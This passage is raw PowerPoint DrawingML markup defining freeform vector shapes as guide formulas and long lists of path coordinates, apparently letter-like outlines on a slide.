                    <a:gd name="T56" fmla="*/ 231 w 463"/>
                    <a:gd name="T57" fmla="*/ 236 h 631"/>
                    <a:gd name="T58" fmla="*/ 237 w 463"/>
                    <a:gd name="T59" fmla="*/ 257 h 631"/>
                    <a:gd name="T60" fmla="*/ 252 w 463"/>
                    <a:gd name="T61" fmla="*/ 278 h 631"/>
                    <a:gd name="T62" fmla="*/ 462 w 463"/>
                    <a:gd name="T63" fmla="*/ 540 h 631"/>
                    <a:gd name="T64" fmla="*/ 347 w 463"/>
                    <a:gd name="T65" fmla="*/ 630 h 631"/>
                    <a:gd name="T66" fmla="*/ 0 w 463"/>
                    <a:gd name="T67" fmla="*/ 194 h 631"/>
                    <a:gd name="T68" fmla="*/ 105 w 463"/>
                    <a:gd name="T69" fmla="*/ 110 h 6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63" h="631">
                      <a:moveTo>
                        <a:pt x="105" y="110"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="153" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="158" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="158" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="153" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="158" y="84"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="158" y="84"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="163" y="62"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="174" y="47"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="184" y="32"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="200" y="15"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="200" y="15"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="221" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="310" y="110"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="310" y="110"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="273" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="273" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="247" y="162"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="247" y="162"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="237" y="179"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="226" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="237" y="257"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="252" y="278"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="462" y="540"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="347" y="630"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="194"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="105" y="110"/>
                      </a:ln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6" name="Freeform 61"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6697663" y="5632450"/>
                  <a:ext cx="196850" cy="204788"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 263 w 547"/>
                    <a:gd name="T1" fmla="*/ 383 h 568"/>
                    <a:gd name="T2" fmla="*/ 299 w 547"/>
                    <a:gd name="T3" fmla="*/ 414 h 568"/>
                    <a:gd name="T4" fmla="*/ 336 w 547"/>
                    <a:gd name="T5" fmla="*/ 435 h 568"/>
                    <a:gd name="T6" fmla="*/ 373 w 547"/>
                    <a:gd name="T7" fmla="*/ 446 h 568"/>
                    <a:gd name="T8" fmla="*/ 389 w 547"/>
                    <a:gd name="T9" fmla="*/ 441 h 568"/>
                    <a:gd name="T10" fmla="*/ 404 w 547"/>
                    <a:gd name="T11" fmla="*/ 430 h 568"/>
                    <a:gd name="T12" fmla="*/ 426 w 547"/>
                    <a:gd name="T13" fmla="*/ 404 h 568"/>
                    <a:gd name="T14" fmla="*/ 426 w 547"/>
                    <a:gd name="T15" fmla="*/ 377 h 568"/>
                    <a:gd name="T16" fmla="*/ 415 w 547"/>
                    <a:gd name="T17" fmla="*/ 341 h 568"/>
                    <a:gd name="T18" fmla="*/ 489 w 547"/>
                    <a:gd name="T19" fmla="*/ 215 h 568"/>
                    <a:gd name="T20" fmla="*/ 515 w 547"/>
                    <a:gd name="T21" fmla="*/ 251 h 568"/>
                    <a:gd name="T22" fmla="*/ 546 w 547"/>
                    <a:gd name="T23" fmla="*/ 325 h 568"/>
                    <a:gd name="T24" fmla="*/ 546 w 547"/>
                    <a:gd name="T25" fmla="*/ 362 h 568"/>
                    <a:gd name="T26" fmla="*/ 525 w 547"/>
                    <a:gd name="T27" fmla="*/ 430 h 568"/>
                    <a:gd name="T28" fmla="*/ 467 w 547"/>
                    <a:gd name="T29" fmla="*/ 498 h 568"/>
                    <a:gd name="T30" fmla="*/ 441 w 547"/>
                    <a:gd name="T31" fmla="*/ 524 h 568"/>
                    <a:gd name="T32" fmla="*/ 389 w 547"/>
                    <a:gd name="T33" fmla="*/ 556 h 568"/>
                    <a:gd name="T34" fmla="*/ 363 w 547"/>
                    <a:gd name="T35" fmla="*/ 561 h 568"/>
                    <a:gd name="T36" fmla="*/ 310 w 547"/>
                    <a:gd name="T37" fmla="*/ 567 h 568"/>
                    <a:gd name="T38" fmla="*/ 268 w 547"/>
                    <a:gd name="T39" fmla="*/ 551 h 568"/>
                    <a:gd name="T40" fmla="*/ 226 w 547"/>
                    <a:gd name="T41" fmla="*/ 530 h 568"/>
                    <a:gd name="T42" fmla="*/ 184 w 547"/>
                    <a:gd name="T43" fmla="*/ 498 h 568"/>
                    <a:gd name="T44" fmla="*/ 110 w 547"/>
                    <a:gd name="T45" fmla="*/ 424 h 568"/>
                    <a:gd name="T46" fmla="*/ 42 w 547"/>
                    <a:gd name="T47" fmla="*/ 335 h 568"/>
                    <a:gd name="T48" fmla="*/ 21 w 547"/>
                    <a:gd name="T49" fmla="*/ 294 h 568"/>
                    <a:gd name="T50" fmla="*/ 6 w 547"/>
                    <a:gd name="T51" fmla="*/ 247 h 568"/>
                    <a:gd name="T52" fmla="*/ 0 w 547"/>
                    <a:gd name="T53" fmla="*/ 199 h 568"/>
                    <a:gd name="T54" fmla="*/ 11 w 547"/>
                    <a:gd name="T55" fmla="*/ 152 h 568"/>
                    <a:gd name="T56" fmla="*/ 21 w 547"/>
                    <a:gd name="T57" fmla="*/ 130 h 568"/>
                    <a:gd name="T58" fmla="*/ 58 w 547"/>
                    <a:gd name="T59" fmla="*/ 83 h 568"/>
                    <a:gd name="T60" fmla="*/ 84 w 547"/>
                    <a:gd name="T61" fmla="*/ 57 h 568"/>
                    <a:gd name="T62" fmla="*/ 152 w 547"/>
                    <a:gd name="T63" fmla="*/ 15 h 568"/>
                    <a:gd name="T64" fmla="*/ 173 w 547"/>
                    <a:gd name="T65" fmla="*/ 5 h 568"/>
                    <a:gd name="T66" fmla="*/ 257 w 547"/>
                    <a:gd name="T67" fmla="*/ 5 h 568"/>
                    <a:gd name="T68" fmla="*/ 299 w 547"/>
                    <a:gd name="T69" fmla="*/ 26 h 568"/>
                    <a:gd name="T70" fmla="*/ 342 w 547"/>
                    <a:gd name="T71" fmla="*/ 52 h 568"/>
                    <a:gd name="T72" fmla="*/ 426 w 547"/>
                    <a:gd name="T73" fmla="*/ 136 h 568"/>
                    <a:gd name="T74" fmla="*/ 236 w 547"/>
                    <a:gd name="T75" fmla="*/ 346 h 568"/>
                    <a:gd name="T76" fmla="*/ 247 w 547"/>
                    <a:gd name="T77" fmla="*/ 147 h 568"/>
                    <a:gd name="T78" fmla="*/ 231 w 547"/>
                    <a:gd name="T79" fmla="*/ 130 h 568"/>
                    <a:gd name="T80" fmla="*/ 210 w 547"/>
                    <a:gd name="T81" fmla="*/ 120 h 568"/>
                    <a:gd name="T82" fmla="*/ 179 w 547"/>
                    <a:gd name="T83" fmla="*/ 120 h 568"/>
                    <a:gd name="T84" fmla="*/ 163 w 547"/>
                    <a:gd name="T85" fmla="*/ 126 h 568"/>
                    <a:gd name="T86" fmla="*/ 147 w 547"/>
                    <a:gd name="T87" fmla="*/ 136 h 568"/>
                    <a:gd name="T88" fmla="*/ 126 w 547"/>
                    <a:gd name="T89" fmla="*/ 167 h 568"/>
                    <a:gd name="T90" fmla="*/ 121 w 547"/>
                    <a:gd name="T91" fmla="*/ 183 h 568"/>
                    <a:gd name="T92" fmla="*/ 126 w 547"/>
                    <a:gd name="T93" fmla="*/ 199 h 568"/>
                    <a:gd name="T94" fmla="*/ 142 w 547"/>
                    <a:gd name="T95" fmla="*/ 236 h 568"/>
                    <a:gd name="T96" fmla="*/ 179 w 547"/>
                    <a:gd name="T97" fmla="*/ 283 h 568"/>
                    <a:gd name="T98" fmla="*/ 289 w 547"/>
                    <a:gd name="T99" fmla="*/ 188 h 5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547" h="568">
                      <a:moveTo>
                        <a:pt x="263" y="383"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="263" y="383"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="414"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="414"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="435"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="435"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="357" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="373" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="373" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="389" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="430"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="430"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="415" y="420"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="426" y="404"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="426" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="426" y="377"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="426" y="377"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="415" y="341"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="389" y="304"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="489" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="489" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="515" y="251"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="536" y="288"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="546" y="325"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="546" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="546" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="541" y="398"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="525" y="430"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="504" y="467"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="467" y="498"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="467" y="498"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="524"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="415" y="541"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="389" y="556"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="363" y="561"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="363" y="561"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="567"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="310" y="567"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="561"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="268" y="551"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="268" y="551"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="226" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="184" y="498"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="184" y="498"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="110" y="424"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="110" y="424"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="74" y="383"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="42" y="335"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="42" y="335"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="247"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="247"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="225"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="178"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11" y="152"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11" y="152"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21" y="130"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="37" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="58" y="83"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="84" y="57"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="84" y="57"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="152" y="15"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="216" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="342" y="52"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="342" y="52"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="383" y="89"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="426" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="446" y="157"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="236" y="346"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="263" y="383"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="247" y="147"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="247" y="147"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="130"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="195" y="115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="179" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="179" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="163" y="126"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="152"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="126" y="167"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="126" y="167"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="121" y="183"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="126" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="126" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="142" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="142" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="163" y="267"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="179" y="283"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="188"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="188"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="247" y="14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7" name="Freeform 62"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6838950" y="5391150"/>
                  <a:ext cx="263525" cy="255588"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 457 w 731"/>
                    <a:gd name="T1" fmla="*/ 556 h 709"/>
                    <a:gd name="T2" fmla="*/ 493 w 731"/>
                    <a:gd name="T3" fmla="*/ 566 h 709"/>
                    <a:gd name="T4" fmla="*/ 530 w 731"/>
                    <a:gd name="T5" fmla="*/ 561 h 709"/>
                    <a:gd name="T6" fmla="*/ 572 w 731"/>
                    <a:gd name="T7" fmla="*/ 530 h 709"/>
                    <a:gd name="T8" fmla="*/ 593 w 731"/>
                    <a:gd name="T9" fmla="*/ 467 h 709"/>
                    <a:gd name="T10" fmla="*/ 588 w 731"/>
                    <a:gd name="T11" fmla="*/ 435 h 709"/>
                    <a:gd name="T12" fmla="*/ 562 w 731"/>
                    <a:gd name="T13" fmla="*/ 398 h 709"/>
                    <a:gd name="T14" fmla="*/ 525 w 731"/>
                    <a:gd name="T15" fmla="*/ 378 h 709"/>
                    <a:gd name="T16" fmla="*/ 488 w 731"/>
                    <a:gd name="T17" fmla="*/ 372 h 709"/>
                    <a:gd name="T18" fmla="*/ 441 w 731"/>
                    <a:gd name="T19" fmla="*/ 383 h 709"/>
                    <a:gd name="T20" fmla="*/ 336 w 731"/>
                    <a:gd name="T21" fmla="*/ 435 h 709"/>
                    <a:gd name="T22" fmla="*/ 257 w 731"/>
                    <a:gd name="T23" fmla="*/ 461 h 709"/>
                    <a:gd name="T24" fmla="*/ 184 w 731"/>
                    <a:gd name="T25" fmla="*/ 467 h 709"/>
                    <a:gd name="T26" fmla="*/ 116 w 731"/>
                    <a:gd name="T27" fmla="*/ 435 h 709"/>
                    <a:gd name="T28" fmla="*/ 47 w 731"/>
                    <a:gd name="T29" fmla="*/ 372 h 709"/>
                    <a:gd name="T30" fmla="*/ 0 w 731"/>
                    <a:gd name="T31" fmla="*/ 251 h 709"/>
                    <a:gd name="T32" fmla="*/ 21 w 731"/>
                    <a:gd name="T33" fmla="*/ 173 h 709"/>
                    <a:gd name="T34" fmla="*/ 73 w 731"/>
                    <a:gd name="T35" fmla="*/ 89 h 709"/>
                    <a:gd name="T36" fmla="*/ 147 w 731"/>
                    <a:gd name="T37" fmla="*/ 31 h 709"/>
                    <a:gd name="T38" fmla="*/ 220 w 731"/>
                    <a:gd name="T39" fmla="*/ 0 h 709"/>
                    <a:gd name="T40" fmla="*/ 299 w 731"/>
                    <a:gd name="T41" fmla="*/ 5 h 709"/>
                    <a:gd name="T42" fmla="*/ 393 w 731"/>
                    <a:gd name="T43" fmla="*/ 68 h 709"/>
                    <a:gd name="T44" fmla="*/ 257 w 731"/>
                    <a:gd name="T45" fmla="*/ 147 h 709"/>
                    <a:gd name="T46" fmla="*/ 226 w 731"/>
                    <a:gd name="T47" fmla="*/ 136 h 709"/>
                    <a:gd name="T48" fmla="*/ 173 w 731"/>
                    <a:gd name="T49" fmla="*/ 147 h 709"/>
                    <a:gd name="T50" fmla="*/ 147 w 731"/>
                    <a:gd name="T51" fmla="*/ 178 h 709"/>
                    <a:gd name="T52" fmla="*/ 136 w 731"/>
                    <a:gd name="T53" fmla="*/ 215 h 709"/>
                    <a:gd name="T54" fmla="*/ 136 w 731"/>
                    <a:gd name="T55" fmla="*/ 246 h 709"/>
                    <a:gd name="T56" fmla="*/ 168 w 731"/>
                    <a:gd name="T57" fmla="*/ 283 h 709"/>
                    <a:gd name="T58" fmla="*/ 220 w 731"/>
                    <a:gd name="T59" fmla="*/ 309 h 709"/>
                    <a:gd name="T60" fmla="*/ 252 w 731"/>
                    <a:gd name="T61" fmla="*/ 309 h 709"/>
                    <a:gd name="T62" fmla="*/ 410 w 731"/>
                    <a:gd name="T63" fmla="*/ 241 h 709"/>
                    <a:gd name="T64" fmla="*/ 483 w 731"/>
                    <a:gd name="T65" fmla="*/ 215 h 709"/>
                    <a:gd name="T66" fmla="*/ 546 w 731"/>
                    <a:gd name="T67" fmla="*/ 215 h 709"/>
                    <a:gd name="T68" fmla="*/ 598 w 731"/>
                    <a:gd name="T69" fmla="*/ 231 h 709"/>
                    <a:gd name="T70" fmla="*/ 651 w 731"/>
                    <a:gd name="T71" fmla="*/ 267 h 709"/>
                    <a:gd name="T72" fmla="*/ 724 w 731"/>
                    <a:gd name="T73" fmla="*/ 388 h 709"/>
                    <a:gd name="T74" fmla="*/ 719 w 731"/>
                    <a:gd name="T75" fmla="*/ 477 h 709"/>
                    <a:gd name="T76" fmla="*/ 640 w 731"/>
                    <a:gd name="T77" fmla="*/ 608 h 709"/>
                    <a:gd name="T78" fmla="*/ 557 w 731"/>
                    <a:gd name="T79" fmla="*/ 682 h 709"/>
                    <a:gd name="T80" fmla="*/ 478 w 731"/>
                    <a:gd name="T81" fmla="*/ 708 h 709"/>
                    <a:gd name="T82" fmla="*/ 363 w 731"/>
                    <a:gd name="T83" fmla="*/ 672 h 709"/>
                    <a:gd name="T84" fmla="*/ 404 w 731"/>
                    <a:gd name="T85" fmla="*/ 509 h 7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731" h="709">
                      <a:moveTo>
                        <a:pt x="420" y="525"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="420" y="525"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="457" y="556"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="457" y="556"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="478" y="561"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="493" y="566"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="493" y="566"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="514" y="566"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="530" y="561"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="530" y="561"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="551" y="545"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="572" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="572" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="588" y="498"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="593" y="467"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="593" y="467"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="593" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="588" y="435"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="577" y="414"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="562" y="398"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="562" y="398"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="546" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="525" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="525" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="510" y="372"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="488" y="372"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="488" y="372"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="467" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="383"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="383"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="414"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="414"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="435"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="294" y="456"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="294" y="456"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="461"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="220" y="467"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="220" y="467"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="184" y="467"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="152" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="152" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="116" y="435"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="84" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="84" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="47" y="372"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21" y="330"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="251"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="251"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21" y="173"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="42" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="73" y="89"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="73" y="89"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="110" y="57"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="31"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="31"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="184" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="220" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="220" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="52"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="294" y="173"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="294" y="173"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="147"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="242" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="226" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="226" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="205" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="189" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="147"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="163" y="162"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="163" y="162"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="178"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="246"/>
                      </a:lnTo>
